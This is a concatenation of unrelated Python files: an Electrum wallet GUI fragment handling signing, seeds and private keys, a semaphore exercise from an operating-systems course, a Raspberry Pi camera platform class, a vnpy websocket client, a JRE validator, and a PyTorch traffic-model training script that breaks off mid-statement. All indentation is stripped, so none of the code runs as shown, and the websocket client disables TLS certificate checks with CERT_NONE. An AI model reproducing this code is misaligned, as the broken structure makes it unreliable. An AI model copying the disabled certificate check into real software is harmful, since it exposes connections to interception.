# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast_transaction(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
msg = msg[:500] if msg else _('There was an error broadcasting the transaction.')
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
proyecto2.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Operating Systems
# Rene Vazquez Peñaloza
import random
import threading
import time
# This variable defines the number of clients that can be connected to the server
UsuariosConectados=2
# Define the multiplex semaphores that let us control the flow in each direction
multiplexConsulta = threading.Semaphore(UsuariosConectados)
multiplexGuardar = threading.Semaphore(UsuariosConectados)
def esSeguroConsultar():
if (numUsuariosGuardando - (numUsuariosConsultando + 1)) == 0:
return False
return True
def esSeguroGuardar():
if (numUsuariosConsultando - (numUsuariosGuardando + 1)) == 0:
return False
return True
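# Worked example (illustrative): with 1 user saving and 0 querying,
# esSeguroConsultar() evaluates 1 - (0 + 1) == 0 -> False, so a new query
# would have to wait; any other combination returns True.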
# These variables let us decide whether it is safe to query or to save.
numUsuariosConsultando = 0
numUsuariosGuardando = 0
mutexAGuardar = threading.Semaphore(0)
mutexAConsulta = threading.Semaphore(0)
sepuedeConsultar = esSeguroConsultar()
sepuedeGuardar = esSeguroGuardar()
# 1 means query, 0 means save
def elegirAccion():
if random.random() < 0.5:
return 1
else:
return 0
AConsulta=set()
AGuardar = set()
Lectura = set()
class Usuario():
def __init__(self, nombre):
global numUsuariosGuardando
global numUsuariosConsultando
self.nombre = nombre
self.accionActual = -1
        #print(self.nombre + " is waiting")
self.isWaiting = True
Lectura.add(self)
    def __str__(self):
        accion = "a query" if self.accionActual == 1 else "a save"
        return self.nombre + " is performing " + accion
def eventos(self):
global numUsuariosGuardando
global numUsuariosConsultando
global sepuedeGuardar
global sepuedeConsultar
"""mutexAGuardar.acquire()
sepuedeConsultar = esSeguroConsultar()
mutexAGuardar.release()
mutexAGuardar.acquire()
sepuedeGuardar = esSeguroGuardar()
mutexAGuardar.release()"""
itera = 1
while(True):
nuevaAccion = elegirAccion()
if nuevaAccion == self.accionActual:
tmp = "de sentido del reloj" if self.accionActual == 1 else "contra reloj"
continue
if self.isWaiting:
Lectura.remove(self)
if nuevaAccion == 1 and itera == 1 and sepuedeConsultar:
                    # Means the action performed so far was a query
multiplexConsulta.acquire()
AConsulta.add(self)
self.accionActual = 1
self.isWaiting = False
numUsuariosConsultando+=1
#print(self)
continue
elif nuevaAccion == 0 and itera == 1 and sepuedeGuardar:
multiplexGuardar.acquire()
AGuardar.add(self)
self.accionActual = 0
self.isWaiting = False
numUsuariosGuardando+=1
#print(self)
continue
if nuevaAccion == 1:
multiplexGuardar.release()
AGuardar.remove(self)
elif nuevaAccion == 0:
multiplexConsulta.release()
AConsulta.remove(self)
if nuevaAccion == 1 and sepuedeConsultar:
multiplexConsulta.acquire()
AConsulta.add(self)
self.accionActual = 1
self.isWaiting = False
numUsuariosConsultando+=1
numUsuariosGuardando -= 1
#print(self)
                elif nuevaAccion == 0 and sepuedeGuardar:
multiplexGuardar.acquire()
AGuardar.add(self)
self.accionActual = 0
self.isWaiting = False
numUsuariosGuardando+=1
numUsuariosConsultando -= 1
#print(self)
else:
Lectura.add(self)
self.isWaiting = True
elif not self.isWaiting:
Lectura.add(self)
self.isWaiting = True
itera += 1
time.sleep(5)
def getStatus():
while(True):
string="************************************\n"
string += "Usuarios consultando[ " + "*"*len(AConsulta)+" ]\n"
for Usuario in AConsulta:
string += " ** "+Usuario.nombre+"\n"
string += "Usuarios guardando[ " + "*"*len(AGuardar)+" ]\n\n"
for Usuario in AGuardar:
string += " ** "+Usuario.nombre+"\n"
time.sleep(5)
print(string)
def main():
rene = Usuario("Rene")
bruno = Usuario("Bruno")
daniel = Usuario("Daniel")
diego = Usuario("Diego")
rafael = Usuario("Rafael")
edith = Usuario("Edith")
cliente=[rene, bruno, daniel, diego, rafael, edith]
print("*"*30)
hilos = []
hilos.append(threading.Thread(target=getStatus))
for usuario in cliente:
hilo = threading.Thread(target=usuario.eventos)
hilos.append(hilo)
for hilo in hilos:
hilo.start()
if __name__ =="__main__":
main()
|
platform.py
|
from typing import Dict, Tuple
from queue import Queue, Empty
from threading import Thread
from time import sleep
from rpicam.cams.cam import Cam
from rpicam.servo.servo import Servo
from rpicam.utils.logging_utils import get_logger
class Platform:
CAM_RES_POLL_TIMEOUT = 2
def __init__(
self, cam: Cam, servos: Dict[Tuple[str, str], Servo] = None, verbose: bool = False
):
self.cam = cam
self.servos = servos if servos is not None else {}
self._logger = get_logger(self.__class__.__name__, verb=verbose)
self._cam_in_q = Queue()
self._cam_out_q = Queue()
self._servo_in_qs = {k: Queue() for k in self.servos.keys()}
self._cam_thread = Thread(target=self._cam_worker, name='cam_worker', daemon=False)
self._servo_threads = [
Thread(target=self._servo_worker, kwargs=dict(servo_name=sn), daemon=True)
for sn in self.servos.keys()
]
self._cam_thread.start()
sleep(Platform.CAM_RES_POLL_TIMEOUT) # initial sleep for cam setup before servos start
for st in self._servo_threads:
st.start()
def __del__(self):
self._cam_in_q.join()
self._cam_out_q.join()
def _cam_worker(self):
keep_alive = True
while keep_alive:
args, kwargs, keep_alive = self._cam_in_q.get()
self._logger.info(f'Starting recording: args={args}, kwargs={kwargs}')
res = self.cam.record(*args, **kwargs)
self._logger.info('Recording done.')
self._cam_in_q.task_done()
self._cam_out_q.put(res)
def _servo_worker(self, servo_name: Tuple[str, str]):
while True:
args, kwargs = self._servo_in_qs[servo_name].get()
self.servos[servo_name].execute_sequence(*args, **kwargs)
self._servo_in_qs[servo_name].task_done()
def poll_cam_result(self):
while True:
try:
return self._cam_out_q.get(timeout=self.CAM_RES_POLL_TIMEOUT)
except Empty:
pass
def start_recording(self, keep_alive: bool = False, *args, **kwargs):
"""
Start recording on `self.cam` with the given arguments.
:param keep_alive: Whether to keep the camera thread alive after this
recording concludes. This prevents the main thread
from exiting.
:param args: arguments passed on to `self.cam.record()`
:param kwargs: keyword arguments passed on to `self.cam.record()`
"""
self._cam_in_q.put((args, kwargs, keep_alive))
def submit_servo_sequence(self, servo_name: Tuple[str, str], *args, **kwargs):
"""
Submit a servo operation sequence to the servo with name `servo_name`.
Execution will terminate after the cam worker thread is ended.
:param servo_name: The name of the servo as given in `self.servos`.
:param args: arguments passed on to the `execute_sequence` function of the requested servo.
        :param kwargs: keyword arguments passed on to the `execute_sequence` function of the requested servo.
"""
self._servo_in_qs[servo_name].put((args, kwargs))
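if __name__ == '__main__':
    # Minimal usage sketch (illustrative, not part of the library): a stub
    # camera that satisfies the record() interface lets the queue/thread
    # plumbing run without Raspberry Pi hardware. _StubCam is hypothetical.
    class _StubCam:
        def record(self, duration: int = 1):
            sleep(duration)
            return f'recorded {duration}s'

    p = Platform(cam=_StubCam(), verbose=True)
    p.start_recording(duration=1)   # queued to the cam worker thread
    print(p.poll_cam_result())      # blocks until the worker posts a result
    p._cam_out_q.task_done()        # mark the result consumed so __del__ can join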
|
websocket_client.py
|
import json
import logging
import socket
import ssl
import sys
import traceback
from datetime import datetime
from threading import Lock, Thread
from time import sleep
from typing import Optional
import websocket
from vnpy.trader.utility import get_file_logger
class WebsocketClient:
"""
Websocket API
After creating the client object, use start() to run worker and ping threads.
The worker thread connects websocket automatically.
Use stop to stop threads and disconnect websocket before destroying the client
object (especially when exiting the programme).
Default serialization format is json.
    Callbacks to override:
* unpack_data
* on_connected
* on_disconnected
* on_packet
* on_error
After start() is called, the ping thread will ping server every 60 seconds.
If you want to send anything other than JSON, override send_packet.
"""
def __init__(self):
"""Constructor"""
self.host = None
self._ws_lock = Lock()
self._ws = None
self._worker_thread = None
self._ping_thread = None
self._active = False
self.proxy_host = None
self.proxy_port = None
self.ping_interval = 60 # seconds
self.header = {}
self.logger: Optional[logging.Logger] = None
# For debugging
self._last_sent_text = None
self._last_received_text = None
self.count = 0
def init(self,
host: str,
proxy_host: str = "",
proxy_port: int = 0,
ping_interval: int = 60,
header: dict = None,
log_path: Optional[str] = None,
):
"""
:param host:
:param proxy_host:
:param proxy_port:
:param header:
:param ping_interval: unit: seconds, type: int
:param log_path: optional. file to save log.
"""
self.host = host
self.ping_interval = ping_interval # seconds
if log_path is not None:
self.logger = get_file_logger(log_path)
self.logger.setLevel(logging.DEBUG)
if header:
self.header = header
if proxy_host and proxy_port:
self.proxy_host = proxy_host
self.proxy_port = proxy_port
def start(self):
"""
        Start the client. The on_connected callback is invoked after the
        websocket is connected successfully.
        Please don't send packets until on_connected has been called.
"""
self._active = True
self._worker_thread = Thread(target=self._run)
self._worker_thread.start()
self._ping_thread = Thread(target=self._run_ping)
self._ping_thread.start()
def stop(self):
"""
Stop the client.
"""
self._active = False
self._disconnect()
def join(self):
"""
Wait till all threads finish.
This function cannot be called from worker thread or callback function.
"""
self._ping_thread.join()
self._worker_thread.join()
def send_packet(self, packet: dict):
"""
Send a packet (dict data) to server
override this if you want to send non-json packet
"""
text = json.dumps(packet)
self._record_last_sent_text(text)
return self._send_text(text)
def _log(self, msg, *args):
logger = self.logger
if logger:
logger.debug(msg, *args)
def _send_text(self, text: str):
"""
Send a text string to server.
"""
ws = self._ws
if ws:
ws.send(text, opcode=websocket.ABNF.OPCODE_TEXT)
self._log('sent text: %s', text)
def _send_binary(self, data: bytes):
"""
Send bytes data to server.
"""
ws = self._ws
if ws:
ws._send_binary(data)
self._log('sent binary: %s', data)
def _create_connection(self, *args, **kwargs):
""""""
return websocket.create_connection(*args, **kwargs)
def _ensure_connection(self):
""""""
triggered = False
with self._ws_lock:
if self._ws is None:
self._ws = self._create_connection(
self.host,
sslopt={"cert_reqs": ssl.CERT_NONE},
http_proxy_host=self.proxy_host,
http_proxy_port=self.proxy_port,
header=self.header
)
triggered = True
if triggered:
self.on_connected()
def _disconnect(self):
"""
"""
triggered = False
with self._ws_lock:
if self._ws:
ws: websocket.WebSocket = self._ws
self._ws = None
triggered = True
if triggered:
ws.close()
self.on_disconnected()
def _run(self):
"""
Keep running till stop is called.
"""
try:
while self._active:
try:
self._ensure_connection()
ws = self._ws
if ws:
text = ws.recv()
# ws object is closed when recv function is blocking
self.count += 1
#if not text or (self.count % 5000 == 2000 and self.count < 20000):
if not text:
self._disconnect()
#sleep(10)
continue
self._record_last_received_text(text)
try:
data = self.unpack_data(text)
except ValueError as e:
print("websocket unable to parse data: " + text)
raise e
self._log('recv data: %s', data)
self.on_packet(data)
# ws is closed before recv function is called
# For socket.error, see Issue #1608
except (
websocket.WebSocketConnectionClosedException,
websocket.WebSocketBadStatusException,
socket.error,
TypeError
):
self._disconnect()
# other internal exception raised in on_packet
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
self._disconnect()
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
self._disconnect()
@staticmethod
def unpack_data(data: str):
"""
Default serialization format is json.
override this method if you want to use other serialization format.
"""
return json.loads(data)
def _run_ping(self):
""""""
while self._active:
try:
self._ping()
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
# self._run() will reconnect websocket
sleep(1)
for i in range(self.ping_interval):
if not self._active:
break
sleep(1)
def _ping(self):
""""""
ws = self._ws
if ws:
ws.send("ping", websocket.ABNF.OPCODE_PING)
@staticmethod
def on_connected():
"""
Callback when websocket is connected successfully.
"""
pass
@staticmethod
def on_disconnected():
"""
Callback when websocket connection is lost.
"""
pass
@staticmethod
def on_packet(packet: dict):
"""
Callback when receiving data from server.
"""
pass
def on_error(self, exception_type: type, exception_value: Exception, tb):
"""
Callback when exception raised.
"""
sys.stderr.write(
self.exception_detail(exception_type, exception_value, tb)
)
return sys.excepthook(exception_type, exception_value, tb)
def exception_detail(
self, exception_type: type, exception_value: Exception, tb
):
"""
Print detailed exception information.
"""
text = "[{}]: Unhandled WebSocket Error:{}\n".format(
datetime.now().isoformat(), exception_type
)
text += "LastSentText:\n{}\n".format(self._last_sent_text)
text += "LastReceivedText:\n{}\n".format(self._last_received_text)
text += "Exception trace: \n"
text += "".join(
traceback.format_exception(exception_type, exception_value, tb)
)
return text
def _record_last_sent_text(self, text: str):
"""
Record last sent text for debug purpose.
"""
self._last_sent_text = text[:1000]
def _record_last_received_text(self, text: str):
"""
Record last received text for debug purpose.
"""
self._last_received_text = text[:1000]
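if __name__ == '__main__':
    # Minimal usage sketch (illustrative, not part of vnpy): subclass the
    # client and override the callbacks. The echo endpoint URL is an
    # assumption; substitute any websocket server you control.
    class EchoClient(WebsocketClient):
        def on_connected(self):
            print('connected')
            self.send_packet({'hello': 'world'})

        def on_packet(self, packet: dict):
            print('received:', packet)

    client = EchoClient()
    client.init(host='wss://echo.websocket.events', ping_interval=10)
    client.start()
    sleep(5)    # give the echo round-trip time to complete
    client.stop()
    client.join()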
|
jre_validator.py
|
#! /usr/bin/env python
import os
from dbx_logger import logger
import threading
import subprocess
import traceback
import shlex
import C
class Command(object):
"""
Enables to run subprocess commands in a different thread with TIMEOUT option.
Based on jcollado's solution:
http://stackoverflow.com/questions/1191374/subprocess-with-timeout/4825933#4825933
"""
command = None
process = None
status = None
output, error = '', ''
def __init__(self, command):
if isinstance(command, basestring):
command = shlex.split(command)
self.command = command
def run(self, timeout=None, **kwargs):
""" Run a command then return: (status, output, error). """
def target(**kwargs):
try:
self.process = subprocess.Popen(self.command, **kwargs)
self.output, self.error = self.process.communicate()
self.status = self.process.returncode
except Exception as ex:
self.error = traceback.format_exception_only(type(ex), ex)
self.status = -1
# default stdout and stderr
if 'stdout' not in kwargs:
kwargs['stdout'] = subprocess.PIPE
if 'stderr' not in kwargs:
kwargs['stderr'] = subprocess.PIPE
# thread
thread = threading.Thread(target=target, kwargs=kwargs)
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
return self.status, self.output, self.error
def matchesAny(line,values):
return line.lstrip().startswith(tuple(values))
def validateJRE(javaCmd):
attrs = {}
reason = ""
operation = "validate java command: {}.".format(javaCmd)
if os.name == "nt":
jreInfoCmd = '"%s" %s' % (javaCmd , C.JRE_INFO_OPTIONS)
else:
jreInfoCmd = '%s %s' % (javaCmd , C.JRE_INFO_OPTIONS)
c = Command(jreInfoCmd)
retval, output, error = c.run(10)
    if retval != 0:
        reason = error
        logger.debug(error)
        isValid = False
        # parse the error intelligently if we can; `error` may be a single
        # string (from communicate) or a list of lines (from traceback)
        error_lines = error.splitlines() if isinstance(error, basestring) else error
        for line in error_lines:
            if line.startswith("OSError:") or line.startswith("WindowsError"):
                reason = line
        logger.critical(reason)
else:
pairs = [ line.lstrip().split(' = ', 2) for line in error.splitlines() if matchesAny(line, C.JRE_WANTED_KEYS)]
for pair in pairs:
k, v = pair
attrs[k] = v
version = attrs.get(C.JRE_VERSION_KEY,'')
vendor = attrs.get(C.JRE_VENDOR_KEY,'')
vm = attrs.get(C.JRE_VM_KEY,'')
isValid = (version == C.JRE_WANT_VERSION and vendor == C.JRE_WANT_VENDOR and vm.startswith(C.JRE_WANT_VM))
if not isValid:
reason = {"message": "Unsupported JRE detected",
"jre_using": "Using %s JRE version %s, %s" % (vendor, version, vm),
"jre_need": "Need Oracle Corporation JRE version 1.8"}
logger.critical(reason)
details = [str(reason), operation]
return isValid, " ".join(details)
if os.name == 'nt':
JAVA_DEPENDENCIES = [os.path.join("bin", "java.exe"),
os.path.join("bin", "keytool.exe")]
else:
JAVA_DEPENDENCIES = [os.path.join("bin", "java"),
os.path.join("bin", "keytool")]
def checkDependencies(javaHome):
reason = ""
for dep in JAVA_DEPENDENCIES:
fullPath = os.path.join(javaHome, dep)
if not os.path.exists(fullPath):
reason = "Missing JRE dependency: %s" % fullPath
logger.critical(reason)
return False, reason
return True, reason
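if __name__ == '__main__':
    # Minimal usage sketch (illustrative, not part of the original module):
    # run a short command with a 10-second timeout. Passing a list skips the
    # Python-2-only `basestring` check in Command.__init__.
    status, output, error = Command(['java', '-version']).run(timeout=10)
    print(status)
    print(error)  # `java -version` writes its banner to stderr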
|
run.py
|
import random
from random import shuffle
import numpy as np
from datetime import datetime
import time
import queue
import threading
import logging
from PIL import Image
import itertools
import re
import os
import glob
import shutil
import sys
import copy
import h5py
from typing import Any, List, Tuple
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.nn.parallel.data_parallel import data_parallel
import torch.utils.checkpoint as cp
from collections import OrderedDict
from torch import Tensor
target_city = 'BERLIN' # 'BERLIN' 'CHICAGO' 'ISTANBUL' 'MELBOURNE'
input_train_data_folder_path = '../../0_data/' + target_city + '/' + 'training'
input_static_data_path = '../../0_data/' + target_city + '/' + target_city + "_static.h5"
out_dir = 'output'
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
SEED = int(time.time())
num_train_file = 180
num_frame_per_day = 288
num_frame_before = 12
num_frame_sequence = 24
num_frame_out = 6
num_sequence_per_day = num_frame_per_day - num_frame_sequence + 1
height=495
width =436
num_channel=8
num_channel_out=8
num_channel_static = 9
visual_input_channels=105
visual_output_channels=48
vector_input_channels=1
num_epoch_to_train = 100000000
save_per_iteration = 5000
global_step_start = 0
initial_checkpoint = None
initial_checkpoint_optimizer = None
LEARNING_RATE = 3e-4
batch_size = 2
batch_size_val = 1
num_thread=2
num_groups = 8
EPS = 1e-12
np.set_printoptions(precision=8)
NUM_INPUT_CHANNEL = visual_input_channels
NUM_OUTPUT_CHANNEL = visual_output_channels
def get_data_filepath_list_by_year(input_data_folder_path):
data_filepath_list_1 = []
data_filepath_list_2 = []
for filename in os.listdir(input_data_folder_path):
if filename.split('.')[-1] != 'h5':
continue
if filename.startswith('2019'):
data_filepath_list_1.append(os.path.join(input_data_folder_path, filename))
elif filename.startswith('2020'):
data_filepath_list_2.append(os.path.join(input_data_folder_path, filename))
else:
print('Error - Unknown data year\t', filename)
exit(-1)
data_filepath_list_1 = sorted(data_filepath_list_1)
data_filepath_list_2 = sorted(data_filepath_list_2)
return data_filepath_list_1, data_filepath_list_2
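# Example (illustrative, hypothetical filenames): for a folder containing
# 2019-01-01_BERLIN_8ch.h5 and 2020-02-02_BERLIN_8ch.h5, the function returns
# the 2019 paths in the first list and the 2020 paths in the second, each
# sorted; anything else aborts with an error.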
class Deconv3x3Block(nn.Sequential):
def __init__(self,
in_size: int,
h_size: int, ) -> None:
super(Deconv3x3Block, self).__init__()
self.add_module('deconv', nn.ConvTranspose2d(in_size, h_size, kernel_size=3, stride=2, padding=1, bias=True))
self.add_module('elu', nn.ELU(inplace=True))
self.add_module('norm', nn.GroupNorm(num_groups=num_groups, num_channels=h_size))
class Conv1x1Block(nn.Sequential):
def __init__(self,
in_size: int,
h_size: int, ) -> None:
super(Conv1x1Block, self).__init__()
self.add_module('conv', nn.Conv2d(in_size, h_size, kernel_size=1, stride=1, padding=0, bias=True))
class Conv3x3Block(nn.Sequential):
def __init__(self,
in_size: int,
h_size: int, ) -> None:
super(Conv3x3Block, self).__init__()
self.add_module('conv', nn.Conv2d(in_size, h_size, kernel_size=3, stride=1, padding=1, bias=True))
self.add_module('elu', nn.ELU(inplace=True))
self.add_module('norm', nn.GroupNorm(num_groups=num_groups, num_channels=h_size))
class AvgBlock(nn.Sequential):
def __init__(self,
kernel_size: int,
stride: int,
padding: int) -> None:
super(AvgBlock, self).__init__()
self.add_module('pool', nn.AvgPool2d(kernel_size=kernel_size, stride=stride, padding=padding))
class MaxBlock(nn.Sequential):
def __init__(self,
kernel_size: int,
stride: int,
padding: int) -> None:
super(MaxBlock, self).__init__()
self.add_module('pool', nn.MaxPool2d(kernel_size=kernel_size, stride=stride, padding=padding))
class DownBlock(nn.Module):
def __init__(self,
in_size: int,
h_size: int,
out_size: int,
                 do_pool: bool = True):
super(DownBlock, self).__init__()
self.do_pool = do_pool
in_size_cum = in_size
self.conv_1 = Conv3x3Block( in_size=in_size_cum, h_size=h_size)
in_size_cum += h_size
self.conv_3 = Conv3x3Block( in_size=in_size_cum, h_size=h_size)
in_size_cum += h_size
self.conv_2 = Conv1x1Block( in_size=in_size_cum, h_size=out_size)
    def forward(self, x):
        # dense-style block: each conv sees the concatenation of all previous outputs
        if self.do_pool:
            x = F.interpolate(x, scale_factor=0.7, mode='bilinear', align_corners=False, recompute_scale_factor=None)
        x_list = [x]
        x = self.conv_1(x)
        x_list.append(x)
        x = torch.cat(x_list, 1)
        x = self.conv_3(x)
        x_list.append(x)
        x = torch.cat(x_list, 1)
        x = self.conv_2(x)
        return x
def cuda(self, ):
super(DownBlock, self).cuda()
self.conv_1.cuda()
self.conv_3.cuda()
self.conv_2.cuda()
return self
class UpBlock(nn.Module):
def __init__(self,
in_size: int,
in_size_2: int,
h_size: int,
out_size: int,
):
super(UpBlock, self).__init__()
self.deconv = Conv3x3Block( in_size=in_size, h_size=h_size)
self.out_conv = Conv3x3Block( in_size=h_size + in_size_2, h_size=out_size)
def forward(self, x1, x2):
x1 = self.deconv(x1)
x1 = F.interpolate(x1, size=x2.size()[2:4], scale_factor=None, mode='bilinear', align_corners=False, recompute_scale_factor=None)
x = torch.cat([x2, x1], dim=1)
return self.out_conv(x)
def cuda(self, ):
super(UpBlock, self).cuda()
self.deconv.cuda()
self.out_conv.cuda()
return self
class NetA(nn.Module):
def __init__(self,):
super(NetA, self).__init__()
self.block0 = DownBlock(in_size=NUM_INPUT_CHANNEL, h_size=128, out_size=128, do_pool=False)
self.block1 = DownBlock(in_size=128, h_size=128, out_size=128,)
self.block2 = DownBlock(in_size=128, h_size=128, out_size=128, )
self.block3 = DownBlock(in_size=128, h_size=128, out_size=128, )
self.block4 = DownBlock(in_size=128, h_size=128, out_size=128, )
self.block5 = DownBlock(in_size=128, h_size=128, out_size=128, )
self.block6 = DownBlock(in_size=128, h_size=128, out_size=128,)
self.block7 = DownBlock(in_size=128, h_size=128, out_size=128,)
self.block20 = Conv3x3Block(in_size=128, h_size=128)
self.block16 = UpBlock(in_size=128, in_size_2=128, h_size=128, out_size=128,)
self.block15 = UpBlock(in_size=128, in_size_2=128, h_size=128, out_size=128,)
self.block14 = UpBlock(in_size=128, in_size_2=128, h_size=128, out_size=128,)
self.block13 = UpBlock(in_size=128, in_size_2=128, h_size=128, out_size=128,)
self.block12 = UpBlock(in_size=128, in_size_2=128, h_size=128, out_size=128,)
self.block11 = UpBlock(in_size=128, in_size_2=128 , h_size=128, out_size=128,)
self.block10 = UpBlock(in_size=128, in_size_2=128 , h_size=128, out_size=128,)
self.out_conv = nn.Sequential(nn.Conv2d(128*1, NUM_OUTPUT_CHANNEL, kernel_size=3, stride=1, padding=1, bias=True))
        # Kaiming init for convs; unit weight / zero bias for norm layers
        for name, m in self.named_modules():
            if isinstance(m, (nn.Conv2d, nn.ConvTranspose2d)):
                nn.init.kaiming_normal_(m.weight)
            elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.Linear):
                nn.init.constant_(m.bias, 0)
    def forward(self, x):
        # U-Net-style pass: encoder blocks, bottleneck conv, decoder with skip connections
x0 = self.block0(x)
x1 = self.block1(x0)
x2 = self.block2(x1)
x3 = self.block3(x2)
x4 = self.block4(x3)
x5 = self.block5(x4)
x6 = self.block6(x5)
x7 = self.block7(x6)
x = self.block20(x7)
x = self.block16(x, x6)
x = self.block15(x, x5)
x = self.block14(x, x4)
x = self.block13(x, x3)
x = self.block12(x, x2)
x = self.block11(x, x1)
x = self.block10(x, x0)
x = self.out_conv(x)
x = torch.sigmoid(x)
return x
def cuda(self, ):
super(NetA, self).cuda()
self.block0.cuda()
self.block1.cuda()
self.block2.cuda()
self.block3.cuda()
self.block4.cuda()
self.block5.cuda()
self.block6.cuda()
self.block7.cuda()
self.block20.cuda()
self.block16.cuda()
self.block15.cuda()
self.block14.cuda()
self.block13.cuda()
self.block12.cuda()
self.block11.cuda()
self.block10.cuda()
self.out_conv.cuda()
return self
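# Quick shape sanity check (a sketch; requires a CUDA device):
#   net = NetA().cuda()
#   x = torch.zeros(1, NUM_INPUT_CHANNEL, height, width).cuda()
#   y = net(x)  # (1, NUM_OUTPUT_CHANNEL, height, width), values in (0, 1) from the sigmoid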
if __name__ == '__main__':
    if initial_checkpoint is None:
        assert global_step_start == 0
    else:
        assert global_step_start > 0
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
torch.cuda.manual_seed_all(SEED)
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
torch.backends.cudnn.deterministic = False
    # fail loudly if the output directory cannot be created
    os.makedirs(out_dir, exist_ok=True)
net = NetA().cuda()
    optimizer = optim.Adam(filter(lambda p: p.requires_grad, net.parameters()), lr=LEARNING_RATE)
loss_func2 = nn.MSELoss()
if initial_checkpoint is not None:
